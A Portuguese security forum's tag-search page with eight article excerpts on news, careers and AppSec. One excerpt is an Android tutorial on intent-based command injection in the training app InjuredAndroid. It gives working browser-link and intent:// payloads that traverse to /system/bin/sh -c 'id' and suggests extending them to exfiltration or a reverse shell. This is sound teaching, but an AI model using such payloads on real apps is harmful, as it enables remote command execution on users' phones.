Jump to content

Search the Community

Showing results for tags 'segurança'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Supporter area
    • Tools of the Trade
    • Finance transparency
  • MBConf
    • MBConf v1
    • MBConf v2
    • MBConf v3
  • Mente Binária
    • General
    • Computer Architecture
    • Certifications
    • Quantum computing
    • Cryptography
    • Challenges and CTF
    • Hardware Hacking
    • Electronics
    • Conferences
    • Forensics
    • Games
    • Data privacy and laws
    • Code breaking
    • Networking
    • Pentest
    • Speak to us!
    • Software releases
  • Career
    • Study and profession
    • Jobs
  • Reverse Engineering
    • General
    • Malware Analysis
    • Firmware
    • Linux and UNIX-like
    • Windows
  • Programming
    • Assembly
    • C/C++
    • Python
    • Other languages
  • Operating Systems
    • GNU/Linux and UNIX-like
    • Windows
  • Segurança na Internet's Discussão

Categories

  • Crackmes
  • Documentation
  • Debuggers
  • PE tools
  • Books
  • Util
  • Packers
  • Unpackers
  • Virtual Machines

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


GitHub


Twitter


LinkedIn


Website

Found 24 results

  1. Um incidente relacionado aos sistemas do Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) deixou indisponível o acesso ao currículo Lattes e diversos sistemas de informática da instituição. O problema já ocorre há mais de três dias, levando à repercussão, nas redes sociais, de cientistas e professores que estão se manifestando sobre o quanto o "apagão" pode prejudicar seus trabalhos. A Plataforma Lattes CNPq integra as bases de dados de currículos e de instituições da área de ciência e tecnologia em um único sistema de informações. Sua importância e relevância atual se estende não somente às atividades operacionais de fomento do CNPq, como também às ações de outras agências federais e estaduais na área da Ciência e da Tecnologia. O CNPq nomeou o sistema em homenagem a César Lattes, físico brasileiro e um dos principais responsáveis pela criação da instituição. Em comunicado, o CNPq afirma que "o problema que causou a indisponibilidade dos sistemas já foi diagnosticado em parceria com empresas contratadas e os procedimentos para sua reparação foram iniciados". A instituição destaca que existem backups cujos conteúdos estão apoiando o restabelecimento dos sistemas, reforçando que não houve perda de dados da Plataforma Lattes. O incidente repercutiu negativamente entre pessoas que atuam nas áreas de Ciência e Tecnologia, já que o site reúne toda a trajetória acadêmica dos pesquisadores brasileiros, enquanto professores e estudantes cadastram as informações sobre sua produção acadêmica, as pesquisas em andamento ou finalizadas, os artigos publicados, as bolsas conquistadas, entre outros. Apesar do CNPq afirmar que há backup, a demora para o restabelecimento do sistema incomodou os especialistas da área. A Cientista da Computação recentemente entrevistada pelo Mente Binária, Nina da Hora, manifestou em suas redes sociais a insatisfação com as explicações dadas no comunicado do CNPq sobre o ocorrido: O professor e político Comte Bittencourt está entre os que se manifestaram sobre a problemática relacionada à indisponibilidade do sistema: Nós do Mente Binária notamos que parece haver uma negligência em relação aos processos de backup de dados, já que muitas empresas e instituições sofrem com esse tipo de apagão ou falta de acesso, especialmente por conta de ataques e ameaças de segurança, como ransomware, o que tem sido crescente. Isso denota a baixa maturidade das empresas em relação à segurança, disponibilidade e integridade dos dados, que é o caso do incidente ocorrido no CNPq, mesmo que este não esteja relacionado a um ataque.
  2. Atuando na área de segurança há cerca de 10 anos, Fernando Pinheiro (@n3k00n3) possui uma trajetória admirável de alguém que começou a se interessar sozinho por hackear e a partir disso desenvolveu uma carreira que o levou ao cargo de pentester. Mas sua história tem outro fator ainda mais relevante. Se considerando uma pessoa não-binária, Fernando não se identifica com o gênero feminino ou masculino. Esse é um fato que, dentro de sua caminhada profissional, nunca passou a ser relevante ou participar do seu dia a dia. Mas na sua visão, existem poucas oportunidades de conversar sobre o tema na área por ser um ambiente predominantemente masculino e machista. Fernando conta que esse assunto ainda é considerado um tabu na profissão, apesar de nunca ter interferido na sua carreira, que iniciou em Salvador (BA), onde nasceu. Fernando sempre consumiu muito conteúdo da comunidade de segurança da informação, mas o que despertou isso não foi um desejo pela profissão em si. "Meu interesse na área começou logo depois de ver uns jogos na lan house. Tinha que pagar para poder jogar e eu não tinha dinheiro. Eu via meus amigos aumentando de level e eu não conseguia evoluir tanto quanto eles, uma vez que não conseguia pagar as horas. No início foi estranho, mas me deu esse start. Foi aí que eu achei uma vulnerabilidade no aplicativo de gerência da lan house e consegui administrar as horas de todas as pessoas, tendo hora o suficiente para jogar o dia todo", conta em entrevista ao Mente Binária. Depois de um tempo, o administrador da lan house descobriu e criou uma nova versão do aplicativo. Mas Fernando insistiu no hacking até ser expulso da lan house. "Eu já tinha visto em filmes, entendia a ideia dos hackers, mas meu objetivo não era ser hacker, era só jogar. Foi o início de tudo, que chamou minha atenção", diz. E foi mesmo a vontade de jogar que despertou mais a sua curiosidade sobre hacking. Em casa, Fernando pesquisava sobre computação para tentar melhorar seu próprio computador, e acabou encontrando blogs com bastante informação sobre o tema. "Comecei a estudar mais, buscar conhecimento sobre, por exemplo, como funcionavam as vulnerabilidades de aplicações web". Na época com aproximadamente 15 anos, Fernando lia revistas para entender a parte de sistemas operacionais, mas ainda assim não levava tão a sério a história de virar hacker. "Aprendi umas coisas básicas do sistema que ajudaram mais tarde. Meu pai foi um dos maiores apoiadores na época, trazia revistas com CD de computação ou com vários jogos e uma revista digital que ensinava algo. Isso me levou a estudar mais sobre computador em si. Meu pai gostava e me influenciou", destaca. "Só consegui emprego nesse setor quando fui morar em São Paulo" Carreira – Fernando não sabia que dava para trabalhar na área de segurança, mas tinha conhecimento sobre a atividade de programação ou no suporte. "Eu tinha de 19 para 20 anos quando descobri a área de pentest como profissão e que as pessoas pagavam para alguém encontrar falhas. Eu falava para meus amigos 'como assim estavam pagando por isso e a gente fazia de graça?'", lembra. Mesmo depois de descobrir que existia essa profissão, Fernando ainda passou por uma trajetória até virar pentester. "Eu trabalhei com suporte de Linux e como designer ligado à computação. Era legal enquanto não aparecia nada para trabalhar com segurança em si. Apesar de saber que existia a profissão e empresas que contratavam, parecia um mundo distante", diz Fernando, afirmando que em Salvador não tinha empresas na área, e que até hoje dificilmente se encontra uma empresa de segurança ofensiva na região. "Só consegui emprego nesse setor quando fui morar em São Paulo", conta. Mas enquanto ainda trabalhava com suporte de Linux, Fernando estudou e fez cursos sobre manutenção de computadores e redes. "Esse estágio foi em uma cooperativa de software livre, e foi onde eu me encontrei usando Linux, que era algo que eu gostava, pois era uma das base de segurança e estava no meio de uma comunidade ainda maior, com a filosofia hacker vivendo dentro desse ambiente", disse. Fernando ficou nessa empresa/cooperativa durante um pouco mais de 1 ano e depois conseguiu uma vaga como voluntário na Universidade Federal da Bahia (UFBA) para trabalhar como pentester. "Foi meu primeiro trabalho nessa área, mas não era só pentester, eram vários tipos de trabalho. Um deles era resposta a incidentes na automatização de tarefas. A Universidade era muito grande, não era o maior foco achar falha de segurança, mas esse foi o pontapé para a área", conta. Fernando participando do Nullbyte, encontro da comunidade hacker, em 2015 Experiência na área de segurança – Depois da Universidade, onde ficou por uns 6 meses, Fernando participou de um projeto de verão chamado Rails Girls Summer of Code. Lá, aprendeu a desenvolver a linguagem de programação chamada Ruby on Rails para ajudar na segurança da aplicação. "Esse projeto durou cerca de 3 meses, e aí fui para uma empresa de segurança defensiva para implementar soluções de segurança como firewall, antivírus e WAFs. Era o outro lado da moeda", conta. A partir dessa experiência, Fernando conseguiu ver como eram implementadas as soluções de segurança para impedir ataques e como esses ambientes eram gerenciados. "Isso chamou minha atenção sobre como explorar de forma melhor. Eu passei por vários clientes, principalmente de governo, e dava para entender como estavam as falhas e por que existiam. Isso me ajudou bastante a entender uma aplicação ou uma infraestrutura". Depois disso, Fernando foi para São Paulo trabalhar na Cipher, onde atua até hoje. No meio disso, ainda passou por uma empresa de consultoria. "Basicamente, meu dia a dia é encontrar falhas de segurança em aplicações web, aplicações mobile, API, e infraestrutura. Cada semana tem um projeto novo, com linguagens de programação diferentes e desenvolvidas por pessoas diferentes". Dá uma olhada nas publicações que Fernando faz com base em pesquisas que também realiza no tempo livre em seu Blog. Fernando esteve entre os finalistas do Hackaflag em 2014 Quebrando tabus – Fernando destaca que o fato de não se pronunciar muito sobre seu posicionamento de gênero dentro da comunidade LGBTQIA+ talvez seja um dos motivos que fizeram com que esse tema nunca tenha interferido em toda a sua trajetória. "Eu já vi algumas situações em que isso interferiu na vida de outras pessoas, como se isso fosse um demérito ou influenciasse na questão técnica de alguém. Isso é bem diferente do que a comunidade em si e a história do hacking diz", afirma. Citando o Manifesto Hacker, Fernando diz que o que importa é o conhecimento técnico, e não a identidade de gênero ou a sexualidade de alguém. "Isso não quer dizer nada para a comunidade, e sim seu conhecimento científico/técnico e como isso ajuda a comunidade. Esse manifesto fala sobre isso, mas em muitas situações eu vi o oposto", lamenta. Por ainda ser um tema delicado diante de um universo com a mentalidade mais fechada, Fernando não costuma levantar esse assunto com receio da reação da comunidade, de como as pessoas veriam e como isso afetaria sua vida profissional. Contudo, conta uma experiência em que pôde falar mais abertamente sobre o assunto em um hacker space – Raul Hacker Club – em Salvador, onde várias pessoas da área de hacking, TI e desenvolvimento falavam sobre a pauta. "Hacking é liberdade, é quebrar padrões" O verdadeiro hacking – Nas redes sociais, Fernando se classifica abertamente como não-binário, mas ainda assim acredita que falta um debate em si na área de segurança que aborde a comunidade LGBTQIA+. "Se pessoas da comunidade colocam isso em seus perfis, acho que chama atenção para um debate. E publicar sobre isso chama atenção para o assunto, já que são pessoas que estão na área há um tempo e isso não influencia em nada na vida profissional em termos de conteúdo técnico. Isso não deixou ninguém menos hacker, menos desenvolvedor", pontua. Fernando observa que nesse último ano houve uma mudança no cenário, e neste mês de junho, no qual é celebrado o Orgulho LGBTQIA+, o número de pessoas que publicaram sobre o assunto em suas redes aumentou. "Pessoas técnicas, que geralmente postam algo técnico, publicaram sobre o orgulho LGBTQIA+. Existem mais pessoas trans na área falando sobre isso e ajudando outras pessoas a entrarem na área", diz, citando ainda que houve uma recente visibilidade e reconhecimento de mulheres trans na comunidade hacker. Para Fernando, falar sobre o tema é se auto afirmar, lembrar que existe, e faz parte da filosofia dos hackers. "Hacking é liberdade, é quebrar padrões, é achar maneiras de subverter algo. Essas pessoas estão hackeando um padrão estabelecido há muito tempo. Somos hackers, por que não exercer isso na área de segurança? Por que não falar sobre o assunto?", questiona. Fernando incentiva a todos a abordarem esse assunto sem medo. "Seja seu melhor, independente de sua crença, de sua orientação. Falar sobre isso vai ser bom, e não influencia no seu quesito técnico. Falem sobre isso, hackeiem!". 🏳️‍🌈
  3. Esse artigo tem como objetivo introduzir as vulnerabilidades que ocorrem no Android por meio do abuso de Intents. Tentarei ser o mais introdutório possível e listarei todas as referências necessárias, para ajudar caso algum conceito pareça muito avançado. Será utilizado o aplicativo InjuredAndroid como exemplo de apk vulnerável. 541v3 para os companheiros da @duphouse! Sem eles esse texto não seria possível. Para mais conteúdos em português, recomendo a série de vídeos do Maycon Vitali sobre Android no geral, assim como a minha talk na DupCon com vulnerabilidades reais. Existe também o @thatmobileproject para posts sobre segurança em mobile. intent:// Os Intents funcionam como a principal forma dos aplicativos se comunicarem internamente entre si. Por exemplo, se um aplicativo quer abrir o app InjuredAndroid ele pode iniciar-lo por meio de um Intent utilizando a URI flag13://rce. Abaixo um exemplo de código que realiza tal ação: Intent intent = new Intent(); intent.setData(Uri.parse("flag13://rce")); startActivity(intent); Além de aceitar todos os elementos de uma URI (scheme, host, path, query, fragment), um Intent também pode levar dados fortemente tipados por meio dos Intent Extras. Na prática, queries e extras são as formas mais comuns de passar dados entre os aplicativos. Eles serão discutidos com exemplos mais adiante. <intent-filter> Como o Android sabe a qual aplicativo se refere flag13://rce? O InjuredAndroid define um Intent Filter que diz quais tipos de Intent o Sistema Operacional deve enviar para ele. O Intent Filter é definido no AndroidManifest.xml. Vamos analizar a definição do Intent Filter relacionado a flag13://rce: https://github.com/B3nac/InjuredAndroid/blob/master/InjuredAndroid/app/src/main/AndroidManifest.xml <activity android:name=".RCEActivity" android:label="@string/title_activity_rce" android:theme="@style/AppTheme.NoActionBar"> <intent-filter android:label="filter_view_flag11"> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT" /> <category android:name="android.intent.category.BROWSABLE" /> <!-- Accepts URIs that begin with "flag13://” --> <data android:host="rce" android:scheme="flag13" /> </intent-filter> </activity> O atributo name define qual Activity será inicializada. Como ele começa com ponto, o nome é resolvido para package+.RCEActivity = b3nac.injuredandroid.RCEActivity. Dentro do <intent-filter>, a action se refere ao tipo de ação que será executada. Existe uma miríade de tipos de ações que são definidas na classe Intent, porém, na maioria das vezes é utilizada a action padrão android.intent.action.VIEW. O elemento category contém propriedades extras que definem como o Intent vai se comportar. O valor android.intent.category.DEFAULT define que essa Activity pode ser inicializada mesmo se o Intent não tiver nenhum category. O valor android.intent.category.BROWSABLE dita que a Activity pode ser inicializada pelo browser. Isso é super importante pois transforma qualquer ataque em remoto. Por exemplo, supondo que o usuário entre em um site malicioso, esse site consegue inicializar um Intent que abre o App apenas se o Intent Filter tiver a propriedade BROWSABLE. A tag data especifica quais URLs vão corresponder com esse Intent Filter, no nosso caso, o scheme tem que ser flag13 e o host igual a rce, ficando flag13://rce. Todas as partes da URI como path, port, etc. podem ser definidas. flag13://rce Agora que entedemos como Intents e Intents Filters funcionam, vamos procurar alguma vulnerabilidade no flag13://rce (O "rce" ficou meio óbvio né). 🤷‍♂️ Vejamos um trecho do código-fonte da Activity b3nac.injuredandroid.RCEActivity: 49 if (intent != null && intent.data != null) { 50 copyAssets() 51 val data = intent.data 52 try { 53 val intentParam = data!!.getQueryParameter("binary") 54 val binaryParam = data.getQueryParameter("param") 55 val combinedParam = data.getQueryParameter("combined") 56 if (combinedParam != null) { 57 childRef.addListenerForSingleValueEvent(object : ValueEventListener { 58 override fun onDataChange(dataSnapshot: DataSnapshot) { 59 val value = dataSnapshot.value as String? 60 if (combinedParam == value) { 61 FlagsOverview.flagThirteenButtonColor = true 62 val secure = SecureSharedPrefs() 63 secure.editBoolean(applicationContext, "flagThirteenButtonColor", true) 64 correctFlag() 65 } else { 66 Toast.makeText(this@RCEActivity, "Try again! :D", 67 Toast.LENGTH_SHORT).show() 68 } 69 } 70 71 override fun onCancelled(databaseError: DatabaseError) { 72 Log.e(TAG, "onCancelled", databaseError.toException()) 73 } 74 }) 75 } A Activity é inicializada na função onCreate e é lá que o Intent será devidamente tratado. Na linha 49 o aplicativo checa se intent é nulo. Se não for, ele irá pegar algumas queries binary, param e combined. Se combined for nulo ele não entrará no if da linha 56 e irá para o seguinte else: 76 else { 77 78 val process = Runtime.getRuntime().exec(filesDir.parent + "/files/" + intentParam + " " + binaryParam) 79 val bufferedReader = BufferedReader( 80 InputStreamReader(process.inputStream)) 81 val log = StringBuilder() 82 bufferedReader.forEachLine { 83 log.append(it) 84 } 85 process.waitFor() 86 val tv = findViewById<TextView>(R.id.RCEView) 87 tv.text = log.toString() 88 } Na linha 78, são passadas para a função Runtime.getRuntime().exec() as variáveis intentParam e binaryParam. Como essa função executa comandos no sistema, logo temos um Command Injection através do Intent. Vamos tentar explorá-lo! 😈 Normalmente, num Command Injection, tentaríamos passar algum caractere para executar outro commando, como &, /, |, / ou ;, porém se tentarmos desse jeito o Android emitirá um erro referente à primeira parte do comando em filesDir.parent + "/files/", pois não encontrará o arquivo, ou dará erro de permissão e não executará o resto do nosso payload. Para resolvermos esse problema podemos subir de nível na estrutura de diretórios com ../ até chegarmos no diretório root (raiz), a partir daí podemos executar o /system/bin/sh e executar qualquer comando que quisermos. Nossa PoC terá os seguintes passos : Alvo clica num link malicioso. Browser abre um Intent para b3nac.injuredandroid.RCEActivity. A Activity RCEActivity executa o comando do atacante. Nosso index.html ficaria assim: <a href="flag13://rce?binary=..%2F..%2F..%2F..%2F..%2Fsystem%2Fbin%2Fsh%20-c%20%27id%27&param=1">pwn me</a> Deixo de tarefa de casa exfiltrar o resultado do comando, ou abrir uma reverse shell no Android. 😉 S.Intent_Extras Agora digamos que ao invés de receber as variáveis via query, o App as recebesse via Intent Extras, como fazer? Para criar um Intent com Extras apenas usamos a função putExtra. Intent intent = new Intent(); intent.setData(Uri.parse("flag13://rce")); intent.putExtra("binary","../../../../../system/bin/sh -c 'id'"); intent.putExtra("param","1"); startActivity(intent); Ok, com isso conseguimos passar Intents Extras por meio de outro App, mas e pelo Browser? Nós podemos utilizar o scheme intent:// para isso! O Intent referente ao código acima ficaria assim : <a href="intent://rce/#Intent;scheme=flag13;S.binary=..%2F..%2F..%2F..%2F..%2Fsystem%2Fbin%2Fsh%20-c%20%27id%27;S.param=1;end">pwn me</a> Note que primeiro vem o scheme intent://, depois o host rce e logo após a string #Intent, que é obrigatória. A partir daí todas as variáveis são delimitadas por ;. Passamos o scheme=flag13 e definimos os Extras. O nome do Extra é precedido do tipo dele. Como o Extra binary é do tipo String, ele é definido com S.binary. Os Extras podem ter vários tipos. Como a documentação do scheme intent:// é escassa, o melhor jeito é ler o código fonte do Android que faz o parsing dele, com destaque para o seguinte trecho: if (uri.startsWith("S.", i)) b.putString(key, value); else if (uri.startsWith("B.", i)) b.putBoolean(key, Boolean.parseBoolean(value)); else if (uri.startsWith("b.", i)) b.putByte(key, Byte.parseByte(value)); else if (uri.startsWith("c.", i)) b.putChar(key, value.charAt(0)); else if (uri.startsWith("d.", i)) b.putDouble(key, Double.parseDouble(value)); else if (uri.startsWith("f.", i)) b.putFloat(key, Float.parseFloat(value)); else if (uri.startsWith("i.", i)) b.putInt(key, Integer.parseInt(value)); else if (uri.startsWith("l.", i)) b.putLong(key, Long.parseLong(value)); else if (uri.startsWith("s.", i)) b.putShort(key, Short.parseShort(value)); else throw new URISyntaxException(uri, "unknown EXTRA type", i); ;end Podem existir vários tipos de vulnerabilidades oriundas dos Intents, incluindo RCE/SQLi/XSS ou até Buffer Overflow. Só vai depender da criatividade do desenvolvedor. Para estudar esse assunto mais a fundo, recomendo a leitura do blog do @bagipro_ (em Inglês) e dos reports públicos de Bug Bounty, também em Inglês. Uma outra observação é que além do InjuredAndroid, você também pode brincar com o Ovaa. |-|4ck th3 |>l4n3t @caioluders
  4. O Google está trabalhando para adicionar um modo Apenas HTTPS (HTTPS-Only) ao navegador Chrome para proteger o tráfego dos usuários de espionagem, atualizando todas as conexões para HTTPS. Segundo o Bleeping Computer, o novo recurso está sendo testado nas versões de pré-visualização do Chrome 93 Canary para Mac, Windows, Linux, Chrome OS e Android. Embora nenhum anúncio oficial tenha sido feito ainda, o modo HTTPS-Only provavelmente será lançado em 31 de agosto, diz o site. O Google já atualizou o Chrome para o padrão HTTPS em todos os URLs digitados na barra de endereço se o usuário não especificar nenhum protocolo. Para testar o recurso experimental, é preciso habilitar a sinalização "Configuração do modo somente HTTPS" acessando chrome://flags/#https-only-mode-setting. Uma vez ativada a opção "Sempre usar conexões seguras" às configurações de segurança do navegador, o Chrome vai atualizar automaticamente toda a navegação para HTTPS e exibir alertas antes de carregar sites que não o suportam. Ao atualizar todas as conexões de sites para HTTPS, o Google Chrome protegerá os usuários de ataques man-in-the-middle que tentam espionar dados trocados com servidores da Internet por meio do protocolo HTTP não criptografado. O HTTPS também garante que os invasores que tentam interceptar o tráfego da Web não alterem os dados trocados com sites da Internet sem serem detectados.
  5. Nos últimos meses, dividimos algumas dicas para quem tem curiosidade acerca das possibilidades de carreiras em Segurança de Aplicações. Afinal, seja para uma transição de carreira, ou mesmo para quem está ingressando agora no mercado de trabalho, ela é apontada como uma das áreas mais promissoras para os próximos anos. Desta vez, para mostrar como é a rotina e quais são os desafios de um jovem profissional que está desbravando uma das muitas possibilidades de carreiras dentro de Segurança de Aplicações, resolvemos conversar diretamente com alguém que acabou de ingressar neste universo. Nosso bate-papo de hoje é com o Antony Leite, de 17 anos, que há cinco meses é estagiário no time Pentest as a Service (PTaaS) da Conviso, e que, no momento, está estudando para aprimorar suas skills técnicas em relação a Pentest Web e Pentest Mobile. Foi a partir de uma conversa com um professor e com a ajuda de uma comunidade online que ele passou a ter interesse em uma carreira na área e acabou encontrando esta oportunidade na Conviso. Ele nos conta um pouco sobre como é a sua rotina enquanto um profissional que está começando nesta área, quais foram suas primeiras impressões e o que mais o surpreendeu em relação ao dia a dia de uma empresa de AppSec. Confira! Antony, antes de entrar na Conviso, qual era o seu conhecimento sobre Segurança de Aplicações? Já ouvia falar a respeito da área nos cursos que frequenta? Antes de entrar na Conviso eu estava terminando o curso Pentest Profissional e o Pentest Experience da DESEC (já terminei ele e só estou esperando a minha DCPT - Desec Certified Penetration Tester chegar). Eu fiquei sabendo da Conviso por conta do seu produto - o AppSec Flow - em um dos bate papos na Boitatech. Antes de trabalhar na Conviso, você considerava uma carreira em AppSec? Ou aconteceu “por acaso”? Sim. O meu interesse pela a área de AppSec surgiu no início da pandemia e isso se deve a dois fatores. O primeiro é o meu professor Jocenio, que ministrava a matéria de Sistema de Comunicação, ao qual tive o prazer de ter alguns bate-papos sobre as possibilidades de trabalho nessa área. Naquele momento eu percebi que existia um mundo de possibilidades. O segundo fator foi a comunidade Boitatech, eles foram responsáveis pelo meu engajamento inicial na área, meu desenvolvimento em relação às skills técnicas e metodologias de estudo, durante esse tempo sempre estive presente nela, conheci pessoas incríveis que sempre me ajudaram. O que mais te surpreendeu a respeito da rotina de um profissional de AppSec? As possibilidades de trabalho. Antes de entrar na área eu tinha uma visão muito pequena de como funciona toda a operação de AppSec, achava que tinha poucas possibilidades, mas não - existem várias! "A parte mais gratificante acho que é o autodesenvolvimento, a sensação de sempre estar evoluindo, aprendendo algo novo, principalmente na Conviso, onde um dos valores é crescer 1% por dia" Como é a sua rotina de trabalho? A minha rotina de trabalho na Conviso inicia na segunda-feira, com uma reunião semanal, onde são separadas as análises que serão executadas durante a semana e quem será o responsável por cada uma. Normalmente eu fico acompanhando um analista em um projeto. No final da semana, na sexta-feira, acontece a reunião de Review, onde cada membro do time mostra o que ele realizou durante aquela semana, se enfrentaram alguma dificuldade na realização do projeto ou algo do tipo. Depois de 15 dias temos uma reunião de retrospectiva, onde apontamos pontos positivos, pontos que devem ser melhorados e ações para que o time possa melhorar - é uma dinâmica muito legal e produtiva. A cada 30 dias temos ainda a reunião One-a-One que acontece entre você e o seu líder, onde você levará pontos que possam ser melhorados no seu dia a dia, planos para o seu PDI - Plano de Desenvolvimento Pessoal, ou qualquer assunto que caiba a você e ao seu líder. Depois de algum tempo no estágio, acompanhando os analistas, você irá escolher um tema para fazer um blog post, onde a Conviso irá divulgar em seu blog. Para você, qual a parte mais gratificante de trabalhar nesta área? E qual a mais desafiadora? A parte mais gratificante acho que é o autodesenvolvimento, a sensação de sempre estar evoluindo, aprendendo algo novo, principalmente na Conviso, onde um dos valores é crescer 1% por dia. A parte mais desafiadora é quando encontramos a fronteira do nosso conhecimento. Na minha área, isso ocorre quando estamos analisando uma aplicação e encontramos novas tecnologias do mercado ou tecnologias implementadas de forma mais robusta, o que acaba nos levando a ter que estudar esse assunto mais a fundo, levando em conta as especificidades do sistema do cliente. Posso garantir que é bem desafiante, mas, por outro lado, é muito gratificante quando avançamos nessa fronteira do conhecimento. Você pretende seguir carreira em AppSec depois de formado? Se sim, qual direcionamento pretende tomar dentro da área? Sim, pretendo seguir na carreira de AppSec com foco na parte ofensiva. Que dicas você daria para alguém que tem interesse em ingressar na área de AppSec? Frequentar comunidades voltadas para essa área, participar de eventos e buscar se manter sempre atualizado sobre as novas tecnologias e tendências é um ótimo início, como também participar de CTFs, visto que temos ótimas plataformas como o TryHackMe, HackTheBox, PicoCTF. Porém, ressalto que estudar, buscar cursos e certificações voltadas para essa área é muito recomendável, pois são os momentos que você consegue dar alguns saltos de conhecimento. Além disso, junto aos cursos, buscar sempre praticar, testar a teoria e experimentar novas abordagens são também iniciativas que sempre garantem muito aprendizado e um amadurecimento/evolução na área de AppSec. Segurança de Aplicações - possibilidades de carreira vão muito além do Pentest Se assim como o Antony você tem interesse em uma carreira em Segurança de Aplicações, a Conviso tem vagas para variados perfis - desde estagiários a profissionais sênior - e em diversas áreas da empresa. No caso do Antony, ele gostou tanto da experiência no time de Pentest as a Service (PTaaS), que pretende seguir na carreira de AppSec com foco na parte ofensiva. Mas vale lembrar que existem muitas outras áreas em que um profissional pode atuar quando falamos sobre AppSec. Na Conviso, por exemplo, um Analista de Segurança da Informação tem uma série de possibilidades. Este profissional pode trabalhar tanto na área de Consulting - atuando em projetos que têm como objetivo entregar processos, programas e atividades que tenham como foco em AppSec; como pode também atuar no time de Managed Security Services - MSS, como o responsável por diversas etapas do ciclo de desenvolvimento seguro, análise de requisitos, modelagem de ameaças, revisão de código e recomendações de melhores práticas de segurança; e pode ainda também atuar na área de PTaaS, testando aplicações nos mais variados contextos possíveis, subvertendo software e construindo soluções criativas. E vale lembrar que até aqui abordamos apenas algumas das atividades relacionadas aos analistas que atuam nos times de Professional Services. Profissionais como um Desenvolvedor, que se dedica ao desenvolvimento de software, ou mesmo um Account Executive, que atua no time de Sales e tem contato direto com os clientes, também são imprescindíveis para que uma empresa de AppSec funcione e prospere! Se você tem interesse em saber mais sobre a rotina de outros profissionais que fazem uma empresa de Segurança de Aplicações acontecer - como Desenvolvedores Ruby on Rails, bem como time de Sales, Marketing e People Hacking, sinalize nos comentários, e certamente traremos este conteúdo em um próximo texto. Até lá, não deixe de conhecer as vagas abertas na Conviso. 😉
  6. Uma violação de uma pasta da Sony contendo números de identificação de série para cada console PlayStation 3 pode ter banido usuários da plataforma inexplicavelmente. Segundo o ThreatPost, a Sony supostamente deixou uma pasta sem segurança com cada ID de console PS3 online, que foi descoberta e relatada por um YouTuber espanhol em meados de abril. Várias semanas se passaram, e agora os jogadores nos fóruns da PlayStation Network estão reclamando que não conseguem fazer login e estão recebendo a mensagem de erro 8071006. O ThreatPost diz que aparentemente atacantes começaram a usar os IDs roubados do console PS3 para fins maliciosos, fazendo com que os jogadores legítimos fossem banidos. A Sony não respondeu ao pedido do ThreatPost para comentar ou confirmar se há uma relação entre a violação de ID do PS3 e os relatos de jogadores terem sido bloqueados da plataforma. Ainda assim, pesquisadores ressaltaram ao site de notícias a importância de todas as empresas terem controles de segurança mais robustos em tempo real, já que esse pode ser considerado um exemplo da falta de proteções de segurança adequadas e falta de visibilidade da própria empresa sobre seus dados confidenciais em tempo real.
  7. O Google está trabalhando para permitir que código Rust seja utilizado no kernel Linux, o que se trata de uma grande mudança tecnológica e cultural após décadas usando apenas a linguagem C. Para isso, a empresa financiará o projeto com o objetivo aumentar a segurança do sistema operacional, conforme publicou o CNet. A empresa já financia um projeto do Internet Security Research Group para deixar toda a Internet mais segura. Trata-se de um módulo para o Apache HTTP web server (ou simplesmente httpd), que é um software livre, sendo o servidor web mais utilizado no mundo, também escrito em linguagem C, utilizando a linguagem chamada Rust. Agora, o projeto permite possível adicionar novos elementos escritos em Rust no coração do Linux, chamados de kernel, o que tornaria os sistemas operacionais Android e Chrome do Google mais seguros. Miguel Ojeda está sendo contratado para escrever software em Rust para o kernel Linux. O Google está pagando pelo contrato, que será estendido por meio do Internet Security Research Group. A melhor segurança para o Linux é uma boa notícia para todos, exceto para os atacantes. Além dos sistemas operacionais Android e Chrome, os serviços do Google, como YouTube e Gmail, contam com servidores que executam Linux. Ele também capacita a Amazon e o Facebook, e é um acessório nos serviços de computação em nuvem. Não está claro se os líderes do kernel do Linux irão acomodar o Rust. Segundo o CNet, Linus Torvalds, o fundador do Linux, disse que está aberto a mudanças se o Rust para Linux provar seu valor.
  8. A presença de Security Champions nas equipes de desenvolvimento pode trazer uma visão mais estruturada acerca da segurança de aplicações. Além disso, ele pode ser um grande influenciador da cultura de segurança dentro da empresa. Mas você sabe qual é o papel deste profissional? Conversamos com o Rodrigo Maués, Tech Lead na Conviso Application Security, para entender melhor quem é e qual o papel do Security Champion dentro de um time de segurança. O que é o Security Champion De acordo com Maués, dentro de empresas que produzem softwares, é comum existir um atrito ocasional entre duas áreas. Para a área de desenvolvimento, as equipes de segurança são pontos de gargalo dentro de um processo já bem pressionado e com prazos apertados. Do outro lado, temos as equipes de segurança que, por vezes, entram em conflito ao buscar introduzir mais segurança nos produtos entregues pelos desenvolvedores. “Este conflito nem sempre é facilmente solucionado, pois vai contra algo que, do ponto de vista comercial, é bem mais forte que a validação de um código: as demandas de um mercado cada vez mais inovador e ágil”, contextualiza o Tech Lead. É aí que entra o papel do Security Champion. No mundo de Segurança de Aplicações, entendemos os Security Champions como sendo os membros das equipes de desenvolvimento que receberam treinamento específico para atuar como ponto focal de segurança de aplicações dentro do time. Quando um membro do time de desenvolvimento se torna um Security Champion, ele estabelece uma melhor comunicação com seus pares e muda a cultura do desenvolvimento de dentro para fora, já que acessa a mesma linguagem dos membros envolvidos na produção do software. “Desta forma, o time de Desenvolvimento consegue compreender muito melhor a informação passada, uma vez que recebe o conhecimento de um dos seus”, esclarece Maués. Ou seja: o Security Champion trabalha como uma ponte entre as duas áreas, de forma conciliadora, para garantir que a cultura da segurança seja mantida sem desgastar as equipes. Quais as responsabilidades de um Security Champion? Entre as principais responsabilidades dos Security Champions está a mudança cultural dos desenvolvedores, que devem passar a ter um olhar mais cuidadoso no trabalho de codificação, aplicando as melhores práticas de desenvolvimento seguro e buscando ter um olhar cada vez mais focado em segurança desde o início da criação de seus produtos. Um Security Champion, de forma geral, é um transformador cultural para as equipes de desenvolvimento, e atua também como uma ponte de ligação entre as áreas de desenvolvimento e de segurança. “É ele quem consegue manter um entendimento dos dois mundos, amenizando os conflitos e disputas”, esclarece Maués. Algumas atividades comuns do dia a dia de um Security Champion são: Ajudar na realização de revisões de segurança; Ajudar com a observação de melhores práticas de segurança; Desenvolver Modelagem de Ameaças para aplicativos novos e em evolução; Participar de movimentos de P&D – Pesquisa e Desenvolvimento; Orientar na identificação de requisitos de segurança; Avaliar e estudar bugs em código; Servir de elo de contato entre as demais equipes da área de segurança. No entanto, é muito importante ressaltar que o Security Champion não realiza essas tarefas 